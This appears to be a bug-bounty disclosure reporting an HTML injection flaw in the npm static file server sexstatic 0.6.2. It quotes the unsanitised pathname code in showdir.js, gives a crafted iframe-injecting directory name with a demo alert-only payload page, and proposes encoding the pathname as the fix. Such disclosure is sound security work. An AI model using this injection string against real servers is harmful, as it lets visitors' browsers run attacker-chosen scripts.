I would like to report HTML Injection vulnerability in sexstatic
module. It is possible to use HTML in directory names, which might lead to run arbitrary JavaScript code in the browser.
module name: sexstaticversion:0.6.2npm page: https://www.npmjs.com/package/sexstatic
A simple static file server middleware. Use it with a raw http server, express/connect, or flatiron/union!
Also adds the ability to arbitrarily modify output HTML for whatever reason. And adding additional: simple url -> string handlers simple url -> function handlers
see opts.extras if you wanna get what i’m talking about
I may or may not extend this with further addons in the future to suit my needs.
Stats
4 downloads in the last day
29 downloads in the last week
158 downloads in the last month
sexstatic
can be used as static file server and presents directory index in the browser. Output is correctly sanitized against any attempts of HTML or JavaScript injection, due to sanitization done in sexstatic/lib/sexstatic/showdir.js
:
// sexstatic/lib/sexstatic/showdir.js, line 132
var displayName = he.encode(file[0]) + ((isDir)? '/':'');
// TODO: use stylessheets?
html += '<tr>' +
'<td><code>(' + permsToString(file[1]) + ')</code></td>' +
'<td><code>' + sizeToString(file[1], humanReadable, si) + '</code></td>' +
'<td><a href>' + displayName + '</a></td>' +
'</tr>\n';
However, the same sanitization is missing from this part:
// sexstatic/lib/sexstatic/showdir.js, line 106
var html = [
'<!doctype html>',
'<html>',
' <head>',
' <meta charset="utf-8">',
' <title>Index of ' + pathname +'</title>',
' </head>',
' <body>',
'<h1>Index of ' + pathname + '</h1>'
].join('\n') + '\n';
pathname
variable is used without sanitization.
This allows malicious user to use valid HTML code as directory name.
Below I present complete attack scenario with this vulnerability.
sexstatic
module:$ npm install sexstatic
sexstatic
, create directory with following name: "><iframe src="malware_frame.html">/
malware_frame.html
with following content:
<html>
<head>
<meta charset="utf8" />
<title>Frame embeded with malware downloader :P</title>
</head>
<body>
<p>iframe element with malicious code</p>
<script>
alert('Uh oh, I am bad, bad malware!!!')
</script>
</body>
</html>
sexstatic
:$ ./node_modules/sexstatic/lib/sexstatic.js -p 8080
sexstatic serving /home/rafal.janicki/playground/hackerone/Node at http://0.0.0.0:8080
http://localhost:8080
to see directory index:{F274226}
now, click on "><iframe src="malware_frame.html">/
directory name on the files list
malicious JavaScript code from malware_frame.html
file is executed immediately:
{F274225}
pathname
used in HTML output can be sanitized with the same he.encode()
function, as it is already done for every filename.
I hope my report will help keeping Node.js Ecosystem users safe :)
Regards,
Rafal ‘bl4de’ Janicki
Malicious user is able to inject iframe element with malicious JavaScript code via crafted directory name and trick users to open this directory in the browser.